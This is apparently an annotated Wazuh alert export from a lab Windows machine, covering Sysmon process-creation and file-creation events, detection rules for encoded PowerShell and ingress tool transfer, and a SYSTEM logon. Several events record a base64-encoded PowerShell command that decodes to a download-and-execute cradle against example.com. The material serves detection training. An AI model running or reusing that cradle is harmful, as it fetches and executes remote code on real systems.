UtcTime: 2025-04-24 22:56:22.872
ProcessGuid: {94294ddc-c193-680a-f60c-000000000e00}
ProcessId: 1672
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_b1g5bu1u.tbb.ps1
CreationUtcTime: 2025-04-24 22:56:22.872
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:22.872 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c193-680a-f60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1672 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_b1g5bu1u.tbb.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:22.872 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 128 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535387.2827536 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:25.7711247Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350777 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:24.033
ProcessGuid: {94294ddc-c198-680a-f80c-000000000e00}
ProcessId: 14476
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c193-680a-f60c-000000000e00}
ParentProcessId: 1672
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:24.033 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c198-680a-f80c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14476 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c193-680a-f60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 1672 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 132 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535388.2835603 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:26.0786930Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350778 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:26.056
ProcessGuid: {94294ddc-c198-680a-f80c-000000000e00}
ProcessId: 14476
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_d23ja4vf.wy5.ps1
CreationUtcTime: 2025-04-24 22:56:26.056
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:26.056 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c198-680a-f80c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14476 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_d23ja4vf.wy5.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:26.056 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 129 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535391.2838372 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:28.7132822Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350805 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:27.432
ProcessGuid: {94294ddc-c19b-680a-fa0c-000000000e00}
ProcessId: 13544
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c198-680a-f80c-000000000e00}
ParentProcessId: 14476
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:27.432 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c19b-680a-fa0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13544 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c198-680a-f80c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14476 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 133 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535391.2846443 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:28.9848322Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350806 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:28.934
ProcessGuid: {94294ddc-c19b-680a-fa0c-000000000e00}
ProcessId: 13544
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_jugljtfi.vxn.ps1
CreationUtcTime: 2025-04-24 22:56:28.934
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:28.934 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c19b-680a-fa0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13544 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jugljtfi.vxn.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:28.934 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535391.2849212 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:29.1998112Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 44009 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
